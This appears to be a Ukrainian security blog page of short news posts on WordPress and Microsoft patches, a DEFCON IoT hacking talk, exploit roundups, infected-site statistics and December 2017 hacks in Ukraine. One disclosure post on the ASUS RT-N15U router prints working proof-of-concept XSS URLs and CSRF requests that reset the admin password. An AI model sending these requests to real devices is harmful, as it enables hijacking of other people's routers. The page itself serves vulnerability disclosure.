Websecurity - Веб безпека

У жовтні, 31.10.2017, вийшла нова версія WordPress 4.8.3.

WordPress 4.8.3 це секюріті випуск нової 4.8 серії. В якому розробники виправили одну уразливість. Це SQL injection уразливість, що має місце не в ядрі, але в функції $wpdb->prepare(), тому атаку можна провести через плагіни і теми. Подібна потенційна SQLi вже була виправлена у версії WP 4.8.2.

Розробники переробили фільтрацію SQL запитів. Таким чином вони покращили безпеку движка та всіх додатків до нього.

Продовжуючи розпочату традицію, після попереднього відео про взлом ключів і POS систем готелів, пропоную нове відео на секюріті тематику. Цього разу відео про взлом різноманітних мережевих пристроїв. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 25 - All Your Things Are Belong To Us

В жовтні на конференції DEFCON 25 відбувся виступ Zenofex, 0×00string, CJ 000 та Maximus64. В своєму виступі вони розповіли про атаки на різноманітні мережевих пристроїв - від IP камер до розумних телевізорів. В яких вони виявили численні уразливості, що вони представили в своїй доповіді як 0-day. Тому всі бажаючі могли одразу протестувати ці уразливості в зазначених пристроях.

Вони розповіли про проблеми з безпекою в багатьох мережевих пристроях, тим самим давши зрозуміти, що всі мережеві пристрої можуть бути взломані. Це веб камери, DVR, мережеві принтери, відеофони, мережеві системи зберігання даних (NAS), флешки для медіа стрімінгу, портативні Wi-Fi колонки, Wi-Fi роутери, програвачі Blue-ray дисків з сервісом медіа стрімінгу, системи розумного будинку, Smart TV. Рекомендую подивитися дане відео для розуміння поточного стану безпеки мережевих пристроїв.

30.01.2016

У листопаді, 30.11.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-N15U. Це друга частина дірок в RT-N15U.

Раніше я писав про уразливості ASUS RT-N15U.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

31.12.2017

Cross-Site Scripting (WASC-08):

http://site/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
http://site/apply.cgi?next_host=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/apply.cgi?action_mode=+Save+&next_page=SaveRestart.asp&sid_list=General%3B&http_passwd=admin&v_password=admin&action=Save
http://site/apply.cgi?action_mode=Save%26Restart+&next_page=Restarting.asp&sid_list=General%3B&action=Save%26Restart

Уразливі всі версії ASUS RT-N15U. Перевірялося в прошивці v.1.9.2.7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах CP Polls, DW Question Answer, WP Mailto Links, Abtest і в темі Project. Для котрих з’явилися експлоіти.

• WordPress CP Polls 1.0.8 File Upload / Cross Site Scripting (деталі)
• WordPress Project Theme 2.0.95 Cross Site Request Forgery / Cross Site Scripting (деталі)
• WordPress DW Question Answer 1.4.2.2 Cross Site Scripting (деталі)
• WordPress WP Mailto Links 2.0.1 Cross Site Scripting (деталі)
• WordPress Abtest Local File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У грудні місяці Microsoft випустила нові патчі.

У грудневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло багато патчів, але починаючи з квітня бюлетені по безпеці не випускаються, тому їх кількість невідома. Компанія вказує лише назви продуктів та номера патчів, а не кількість і деталі бюлетенів (патчів). Вони закривають уразливості в програмних продуктах компанії.

Дані патчі стосуються поточних операційних систем компанії Microsoft - Windows 7, 8.1, RT 8.1, 10 та 2016. А також Internet Explorer і Edge та Microsoft Exchange та Endpoint Protection.

В своєму звіті про хакерську активність в Уанеті в 1 півріччі 2017, я згадував, що в першому півріччі було інфіковано 75 сайтів (з них 3 державних сайти).

Сьогодні я провів дослідження сайтів, що були інфіковані в першому півріччі 2017 року, і на 41 сайті вдалося виявити движки. Частина з 75 сайтів вже не працювала, частина використовує html (при цьому деякі з них ховають php-додатки за розширенням html), а ще частина використовували власні php-скрипти.

На перевірених сайтах використовуються наступні движки:

Joomla - 15
WordPress - 10
uCoz - 6
DataLife Engine - 3
Magento - 3
Drupal - 2
OpenCart - 1
VaM Shop - 1

Тобто майже всі інфіковані сайти, з числа працюючих, використовували (за станом на сьогодні) опенсорс веб додатки.

В даній добірці експлоіти в веб додатках:

• FreePBX 13 - Remote Command Execution / Privilege Escalation (деталі)
• Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery (деталі)
• EC-CUBE 2.12.6 - Server-Side Request Forgery (деталі)
• D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure (деталі)
• NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure (деталі)

Раніше я писав про листопадові DDoS атаки та взломи в Україні, а зараз розповім про ситуацію в грудні.

В зв’язку з сепаратистськими і терористичними акціями на сході України, хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Іноземні хакери провели неполітичні взломи державних сайтів:

kyiv-oblosvita.gov.ua (хакером N45HT) - 12.12.2017
osvita.sm.gov.ua (хакером Bilgekultigin) - 19.12.2017

Проукраїнськими хакерами були атаковані наступні сайти:

Грудневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі місяця.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт news-portal.dn.ua (через скаргу хостеру) - 12.2017
Закритий сайт donsju.donetsk.ua (через скаргу хостеру) - 12.2017
Закритий сайт infowar.delovoy.com (через скаргу хостеру) - 12.2017
Закритий сайт lt-lnr.su (через відміну SSL сертифікату) - 21.12.2017

Виявлені уразливості в Microsoft Exchange та інших продуктах компанії. Що були виправлені у вівторку патчів у грудні.

Уразливі продукти: Microsoft Exchange Server 2013, Exchange Server 2016, Endpoint Protection, Forefront Endpoint Protection 2010, Windows Intune Endpoint Protection, Security Essentials, Windows Defender для Windows версії з 7 по 2016.

Виконання коду в Malware Protection Engine.

В даній добірці уразливості в веб додатках:

• ZTE 831CII Multiple Vulnerablities (деталі)
• CollabNet Subversion Edge Password Hash Leak (деталі)
• CollabNet Subversion Edge Hook Script Privilege Escalation (деталі)
• pyjwt security update (деталі)
• ZTE ZXDSL 831 Multiple Cross Site Scripting (деталі)